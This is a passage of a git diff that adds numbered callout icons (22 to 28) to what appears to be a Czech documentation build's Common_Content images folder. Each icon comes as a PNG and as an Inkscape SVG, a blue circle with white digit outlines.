+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 22.579206,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141117,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168786,0.157724 -0.257324,0.240723 -0.08855,0.08302 -0.17432,0.157723 -0.257325,0.224121 l -1.394531,1.120605 -1.245117,-1.543945 3.909668,-3.1127931 2.108398,0 0,12.1357421"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/22.png b/tmp/cs-CZ/xml/Common_Content/images/22.png
new file mode 100644
index 000000000..b724ced13
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/22.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/22.svg b/tmp/cs-CZ/xml/Common_Content/images/22.svg
new file mode 100644
index 000000000..22deeb3ed
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/22.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.621199,22.008438 -8.143067,0 0,-1.784668 2.855469,-3.07959 c 0.359697,-0.387364 0.686194,-0.744297 0.979492,-1.0708 0.29329,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373535,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437179,10e-6 -0.857751,0.10792 -1.261719,0.323731 -0.403974,0.215829 -0.827314,0.522958 -1.27002,0.921386 l -1.394531,-1.651855 c 0.249023,-0.226877 0.509114,-0.442698 0.780274,-0.647461 0.271157,-0.210275 0.569985,-0.395659 0.896484,-0.556152 0.326495,-0.16047 0.686195,-0.2877488 1.079101,-0.3818364 0.3929,-0.099597 0.832841,-0.1494018 1.319825,-0.1494141 0.581049,1.23e-5 1.101231,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860507,0.3901488 1.187011,0.6889648 0.32649,0.293305 0.575513,0.650239 0.747071,1.070801 0.177075,0.420583 0.265616,0.893727 0.265625,1.419433 -9e-6,0.47592 -0.08302,0.932463 -0.249024,1.369629 -0.166024,0.431648 -0.392911,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622565,0.830083 -1.004394,1.245117 -0.376309,0.40951 -0.78028,0.827315 -1.211914,1.253418 l -1.460938,1.469238 0,0.116211 4.947266,0 0,2.158203"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/23.png b/tmp/cs-CZ/xml/Common_Content/images/23.png
new file mode 100644
index 000000000..8b69b8292
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/23.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/23.svg b/tmp/cs-CZ/xml/Common_Content/images/23.svg
new file mode 100644
index 000000000..c0a33eeb0
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/23.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.148054,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.207519,1.137207 -0.132821,0.33204 -0.318205,0.625334 -0.556153,0.879883 -0.232429,0.249031 -0.509121,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979486,0.121751 1.721021,0.420579 2.22461,0.896485 0.503572,0.470382 0.755362,1.106775 0.755371,1.909179 -9e-6,0.531253 -0.09685,1.023766 -0.290528,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879882,1.170411 -0.392911,0.332031 -0.890958,0.592122 -1.494141,0.780273 -0.597662,0.182617 -1.303227,0.273926 -2.116699,0.273926 -0.652998,0 -1.267256,-0.05534 -1.842774,-0.166016 -0.575522,-0.105143 -1.112305,-0.268392 -1.610351,-0.489746 l 0,-2.183105 c 0.249022,0.132815 0.51188,0.249025 0.788574,0.348632 0.276691,0.09961 0.553384,0.185387 0.830078,0.257325 0.27669,0.06641 0.547849,0.116212 0.813477,0.149414 0.271155,0.0332 0.525712,0.04981 0.763671,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315425,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188146,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124512,-0.73877 -7e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.20474 -0.265631,-0.376289 -0.498047,-0.51464 -0.226893,-0.143876 -0.525721,-0.254553 -0.896485,-0.332032 -0.370772,-0.07747 -0.827315,-0.116205 -1.369628,-0.116211 l -0.863282,0 0,-1.801269 0.84668,0 c 0.509111,7e-6 0.93245,-0.04426 1.270019,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124512,-0.672363 -6e-6,-0.431632 -0.135585,-0.769197 -0.406739,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,1e-5 -0.514652,0.02768 -0.747071,0.08301 -0.226891,0.04981 -0.439944,0.116221 -0.63916,0.199218 -0.193687,0.07748 -0.373537,0.166026 -0.53955,0.265625 -0.160484,0.09409 -0.307131,0.188161 -0.439942,0.282227 l -1.294922,-1.709961 c 0.232421,-0.171538 0.484212,-0.329253 0.755371,-0.473145 0.276692,-0.143868 0.575519,-0.26838 0.896485,-0.373535 0.320961,-0.1106647 0.666826,-0.1964393 1.037597,-0.2573239 0.370765,-0.06086 0.766435,-0.091296 1.187012,-0.091309 0.597651,1.23e-5 1.139969,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/24.png b/tmp/cs-CZ/xml/Common_Content/images/24.png
new file mode 100644
index 000000000..863ce3b66
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/24.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/24.svg b/tmp/cs-CZ/xml/Common_Content/images/24.svg
new file mode 100644
index 000000000..27e1d39c9
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/24.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.803816,19.493301 -1.460938,0 0,2.515137 -2.498535,0 0,-2.515137 -5.013672,0 0,-1.784668 5.154785,-7.8359371 2.357422,0 0,7.6284181 1.460938,0 0,1.992187 m -3.959473,-1.992187 0,-2.058594 c -5e-6,-0.07193 -5e-6,-0.17431 0,-0.307129 0.0055,-0.138339 0.01106,-0.293287 0.0166,-0.464844 0.0055,-0.171541 0.01106,-0.348625 0.0166,-0.53125 0.01106,-0.182609 0.01936,-0.356925 0.0249,-0.522949 0.01106,-0.166007 0.01936,-0.309887 0.0249,-0.43164 0.01106,-0.12727 0.01936,-0.218579 0.0249,-0.273926 l -0.07471,0 c -0.09961,0.232431 -0.213058,0.478687 -0.340332,0.738769 -0.121749,0.2601 -0.262862,0.520191 -0.42334,0.780274 l -2.02539,3.071289 2.755859,0"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/25.png b/tmp/cs-CZ/xml/Common_Content/images/25.png
new file mode 100644
index 000000000..cc23b9b2b
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/25.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/25.svg b/tmp/cs-CZ/xml/Common_Content/images/25.svg
new file mode 100644
index 000000000..114e1a26b
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/25.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 20.761335,14.255508 c 0.520177,8e-6 1.004389,0.08025 1.452637,0.240723 0.448235,0.160489 0.838372,0.395678 1.17041,0.705566 0.332024,0.309903 0.592114,0.697272 0.780274,1.16211 0.188142,0.459315 0.282218,0.987797 0.282226,1.585449 -8e-6,0.658532 -0.102385,1.250654 -0.307129,1.776367 -0.20476,0.520184 -0.506355,0.962892 -0.904785,1.328125 -0.398444,0.359701 -0.893724,0.636394 -1.48584,0.830078 -0.586594,0.193685 -1.261723,0.290528 -2.02539,0.290528 -0.304366,0 -0.605961,-0.01384 -0.904785,-0.0415 -0.298831,-0.02767 -0.586591,-0.06917 -0.863282,-0.124512 -0.27116,-0.04981 -0.531251,-0.116211 -0.780273,-0.199219 -0.243491,-0.08301 -0.464845,-0.17985 -0.664063,-0.290527 l 0,-2.216309 c 0.193684,0.11068 0.417805,0.215823 0.672364,0.31543 0.254555,0.09408 0.517413,0.177086 0.788574,0.249024 0.27669,0.06641 0.553383,0.121746 0.830078,0.166015 0.276689,0.03874 0.539547,0.05811 0.788574,0.05811 0.741532,2e-6 1.305985,-0.152179 1.69336,-0.456543 0.387364,-0.309893 0.581048,-0.799639 0.581054,-1.469239 -6e-6,-0.597651 -0.190924,-1.051427 -0.572754,-1.361328 -0.376307,-0.315424 -0.960128,-0.473139 -1.751464,-0.473144 -0.143884,5e-6 -0.298832,0.0083 -0.464844,0.0249 -0.160485,0.01661 -0.320967,0.03874 -0.481446,0.06641 -0.15495,0.02768 -0.304364,0.05811 -0.448242,0.09131 -0.143882,0.02767 -0.268394,0.05811 -0.373535,0.09131 l -1.020996,-0.547852 0.456543,-6.1840821 6.408203,0 0,2.1748051 -4.183594,0 -0.199218,2.382324 c 0.177079,-0.03873 0.381832,-0.07747 0.614257,-0.116211 0.237952,-0.03873 0.542314,-0.0581 0.913086,-0.05811"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/26.png b/tmp/cs-CZ/xml/Common_Content/images/26.png
new file mode 100644
index 000000000..583fe3486
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/26.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/26.svg b/tmp/cs-CZ/xml/Common_Content/images/26.svg
new file mode 100644
index 000000000..e9b5d239b
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/26.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 16.428328,16.853653 c -1e-6,-0.581049 0.03044,-1.159336 0.09131,-1.734863 0.06641,-0.575514 0.17985,-1.126132 0.340332,-1.651856 0.166015,-0.531241 0.387369,-1.023753 0.664063,-1.477539 0.282224,-0.453765 0.636391,-0.846669 1.0625,-1.178711 0.431637,-0.337553 0.946285,-0.600411 1.543945,-0.788574 0.603185,-0.1936727 1.305984,-0.2905151 2.108398,-0.2905274 0.116205,1.23e-5 0.243483,0.00278 0.381836,0.0083 0.13834,0.00555 0.276686,0.013847 0.415039,0.024902 0.143873,0.00555 0.282219,0.016614 0.415039,0.033203 0.132805,0.016614 0.251783,0.035982 0.356934,0.058105 l 0,2.0502924 c -0.210294,-0.04979 -0.434415,-0.08853 -0.672363,-0.116211 -0.232429,-0.03319 -0.467618,-0.04979 -0.705567,-0.0498 -0.747076,1e-5 -1.361333,0.09408 -1.842773,0.282226 -0.48145,0.182627 -0.863285,0.439951 -1.145508,0.771973 -0.28223,0.33204 -0.484215,0.730477 -0.605957,1.195312 -0.116214,0.464852 -0.188154,0.9795 -0.21582,1.543946 l 0.09961,0 c 0.110674,-0.199212 0.243487,-0.384596 0.398438,-0.556153 0.160478,-0.177076 0.345862,-0.32649 0.556152,-0.448242 0.210282,-0.127271 0.445471,-0.22688 0.705566,-0.298828 0.265621,-0.07193 0.561681,-0.107902 0.888184,-0.10791 0.52571,8e-6 0.998854,0.08578 1.419434,0.257324 0.420565,0.171557 0.774732,0.42058 1.0625,0.74707 0.293286,0.326504 0.517407,0.727708 0.672363,1.203614 0.154939,0.475916 0.232413,1.021 0.232422,1.635254 -9e-6,0.658532 -0.09408,1.247887 -0.282227,1.768066 -0.182625,0.520184 -0.445483,0.962892 -0.788574,1.328125 -0.343106,0.359701 -0.758145,0.636394 -1.245117,0.830078 -0.486985,0.188151 -1.034836,0.282227 -1.643555,0.282227 -0.59766,0 -1.156579,-0.105144 -1.676758,-0.31543 -0.520185,-0.21582 -0.97396,-0.542317 -1.361328,-0.979492 -0.381837,-0.437173 -0.683432,-0.987791 -0.904785,-1.651856 -0.215821,-0.669593 -0.323731,-1.460933 -0.32373,-2.374023 m 4.216796,3.270508 c 0.226883,2e-6 0.431636,-0.0415 0.614258,-0.124512 0.188146,-0.08854 0.348627,-0.218585 0.481446,-0.390137 0.13834,-0.17708 0.243483,-0.398434 0.315429,-0.664062 0.07747,-0.265622 0.116205,-0.581051 0.116211,-0.946289 -6e-6,-0.592118 -0.124518,-1.056961 -0.373535,-1.394531 -0.243495,-0.343094 -0.61703,-0.514643 -1.120605,-0.514649 -0.254562,6e-6 -0.486984,0.04981 -0.697266,0.149414 -0.21029,0.09962 -0.390141,0.229661 -0.539551,0.390137 -0.149417,0.160487 -0.265628,0.340337 -0.348633,0.539551 -0.07748,0.199223 -0.116214,0.401209 -0.116211,0.605957 -3e-6,0.28223 0.0332,0.564456 0.09961,0.846679 0.07194,0.276696 0.17708,0.528486 0.315429,0.755371 0.143877,0.221357 0.318193,0.401207 0.52295,0.539551 0.210282,0.138349 0.453771,0.207522 0.730468,0.20752"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/27.png b/tmp/cs-CZ/xml/Common_Content/images/27.png
new file mode 100644
index 000000000..d1c3dfa45
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/27.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/27.svg b/tmp/cs-CZ/xml/Common_Content/images/27.svg
new file mode 100644
index 000000000..4a80177b6
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/images/27.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 17.51573,22.008438 4.316406,-9.960937 -5.578125,0 0,-2.1582035 8.367188,0 0,1.6103515 -4.424317,10.508789 -2.681152,0"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/xml/Common_Content/images/28.png b/tmp/cs-CZ/xml/Common_Content/images/28.png
new file mode 100644
index 000000000..f5db74735
Binary files /dev/null and b/tmp/cs-CZ/xml/Common_Content/images/28.png differ
diff --git a/tmp/cs-CZ/xml/Common_Content/images/28.svg b/tmp/cs-CZ/xml/Common_Content/images/28.svg
new file mode 100644
index 000000000..d453f299f
--- /dev/null
